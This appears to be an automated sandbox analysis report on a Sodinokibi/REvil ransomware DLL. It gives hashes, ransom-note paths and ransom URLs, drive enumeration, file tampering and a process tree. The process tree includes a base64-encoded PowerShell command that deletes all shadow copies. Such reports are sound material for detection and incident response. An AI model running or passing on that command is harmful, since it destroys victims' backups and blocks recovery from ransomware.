Analysis
-
max time kernel
97s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
24-07-2022 21:15
Behavioral task
behavioral1
Sample
5cb49636a0d759cf24bd19ce17003a62f1e8d4d076844b9110af8b9172413508.dll
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
5cb49636a0d759cf24bd19ce17003a62f1e8d4d076844b9110af8b9172413508.dll
Resource
win10v2004-20220721-en
General
-
Target
5cb49636a0d759cf24bd19ce17003a62f1e8d4d076844b9110af8b9172413508.dll
-
Size
164KB
-
MD5
853ab7bdeecf03306178f4af40eff694
-
SHA1
ff7b52e2ccf0b4b908af478cb477bc67bae61321
-
SHA256
5cb49636a0d759cf24bd19ce17003a62f1e8d4d076844b9110af8b9172413508
-
SHA512
c9f1de2facf37a215ffe580024346a2a5873c2dcd378cf5226bf9631aeebd03a751f51331aa17bf046033d47bcd4309ed761d74fe4567eea0a95571bb5d5a1e6
Malware Config
Extracted
C:\dl575844-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B78A0E79F0ADECDD
http://decryptor.top/B78A0E79F0ADECDD
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\J: rundll32.exe -
Drops file in Program Files directory 6 IoCs
Processes:
rundll32.exedescription ioc process File created \??\c:\program files (x86)\dl575844-readme.txt rundll32.exe File opened for modification \??\c:\program files\AddMeasure.emz rundll32.exe File opened for modification \??\c:\program files\AssertInvoke.ods rundll32.exe File opened for modification \??\c:\program files\BackupUnprotect.xht rundll32.exe File opened for modification \??\c:\program files\CompareRequest.mp3 rundll32.exe File created \??\c:\program files\dl575844-readme.txt rundll32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
rundll32.exepowershell.exepid process 4428 rundll32.exe 4428 rundll32.exe 4196 powershell.exe 4196 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 4196 powershell.exe Token: SeBackupPrivilege 4344 vssvc.exe Token: SeRestorePrivilege 4344 vssvc.exe Token: SeAuditPrivilege 4344 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 3440 wrote to memory of 4428 3440 rundll32.exe rundll32.exe PID 3440 wrote to memory of 4428 3440 rundll32.exe rundll32.exe PID 3440 wrote to memory of 4428 3440 rundll32.exe rundll32.exe PID 4428 wrote to memory of 4196 4428 rundll32.exe powershell.exe PID 4428 wrote to memory of 4196 4428 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\5cb49636a0d759cf24bd19ce17003a62f1e8d4d076844b9110af8b9172413508.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\5cb49636a0d759cf24bd19ce17003a62f1e8d4d076844b9110af8b9172413508.dll,#12⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/4196-131-0x0000000000000000-mapping.dmp
-
memory/4196-132-0x000002364FD30000-0x000002364FD52000-memory.dmpFilesize
136KB
-
memory/4196-133-0x00007FF867DE0000-0x00007FF8688A1000-memory.dmpFilesize
10.8MB
-
memory/4196-134-0x00007FF867DE0000-0x00007FF8688A1000-memory.dmpFilesize
10.8MB
-
memory/4428-130-0x0000000000000000-mapping.dmp